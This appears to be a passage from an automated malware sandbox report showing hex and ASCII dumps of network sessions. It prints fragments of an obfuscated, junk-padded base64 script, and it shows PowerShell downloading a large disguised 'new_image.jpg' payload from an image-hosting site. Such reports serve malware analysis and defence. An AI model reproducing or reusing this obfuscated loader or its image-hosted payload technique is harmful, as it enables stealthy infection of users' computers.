                                                                                                                                                                                                                                                                Data Ascii: EDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & ladrilho & caleceiro & ladrilho & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTr
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72
                                                                                                                                                                                                                                                                Data Ascii: reDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & ladrilho & caleceiro & ladrilho & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & ladrilho & caleceiro & ladrilho & "wDgTregDgTreD0DgTreIDgTreDgTr
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42
                                                                                                                                                                                                                                                                Data Ascii: reLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & ladrilho & caleceiro & ladrilho & "DgTreDgTregDgTreCQDgTre" & ladrilho & caleceiro & ladrilho & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & ladrilho & caleceiro & ladrilho & "QB4DgTreCDgTreDgTreLQB
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 46 4d 44 67 54 72 65 64 51 42 69 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64
                                                                                                                                                                                                                                                                Data Ascii: FMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & ladrilho & caleceiro & ladrilho & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & ladrilho & caleceiro & lad
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 63 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 51 44 67 54 72 65 65 51 42 77 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 55 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72
                                                                                                                                                                                                                                                                Data Ascii: cwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & ladrilho & caleceiro & ladrilho & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTr
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 54 72 65 62 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 47 55 44 67 54 72 65 64 67 42 70 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 62 77 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 4f 67 42 7a 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 64 44 67 54 72 65 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4a 77 44 67 54 72 65 67 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 7a 44 67 54 72 65 47 45 44
                                                                                                                                                                                                                                                                Data Ascii: TrebDgTreDgTreuDgTreGUDgTredgBpDgTreHIDgTre" & ladrilho & caleceiro & ladrilho & "DgTreBlDgTreG4DgTrebwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTre" & ladrilho & caleceiro & ladrilho & "QBzDgTreGED


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                1192.168.2.449731104.21.45.1384433492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC124OUTGET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1
                                                                                                                                                                                                                                                                Host: uploaddeimagens.com.br
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC691INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:18 GMT
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4201093
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT
                                                                                                                                                                                                                                                                ETag: "66205484-401a85"
                                                                                                                                                                                                                                                                Cache-Control: max-age=2678400
                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                Age: 1325
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHEckdm4n7SbgtVyoQeomX8Nbwmv6G5OLXv27607gpSzDhZBUEToXWgJvimOOzRDj4GNjq2UchOjamLbQNmazB4grB2VXWdS6oP13hEbKjLXvY39tPbXWAtBEVzCbR2Id5G02hQrNUq%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8766f5bb8d034570-ATL
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC678INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a
                                                                                                                                                                                                                                                                Data Ascii: zccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53
                                                                                                                                                                                                                                                                Data Ascii: Ay2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1S
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64
                                                                                                                                                                                                                                                                Data Ascii: r7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hd
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45
                                                                                                                                                                                                                                                                Data Ascii: HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a
                                                                                                                                                                                                                                                                Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d
                                                                                                                                                                                                                                                                Data Ascii: f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05
                                                                                                                                                                                                                                                                Data Ascii: u#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60
                                                                                                                                                                                                                                                                Data Ascii: nq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5`
                                                                                                                                                                                                                                                                2024-04-18 19:11:18 UTC1369INData Raw: 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c
                                                                                                                                                                                                                                                                Data Ascii: K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.449732104.21.45.1384433492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-04-18 19:11:19 UTC100OUTGET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1
                                                                                                                                                                                                                                                                Host: uploaddeimagens.com.br
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:20 GMT
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4201093
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT
                                                                                                                                                                                                                                                                ETag: "66205484-401a85"
                                                                                                                                                                                                                                                                Cache-Control: max-age=2678400
                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                Age: 1327
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4IvI6pquJI%2FGQjX2eiGdgyK5if5lWxOG23ejgZ7vDU4goklVflRhMMwg9jsszELkstTj2esjU8APJgE4RKIpbPw%2FObv6OCjAMuhkFHUHGfCotktGEOJs4gXZOB9fruNjjPFrntsFG9Xk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8766f5c6f8fd4539-ATL
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC676INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
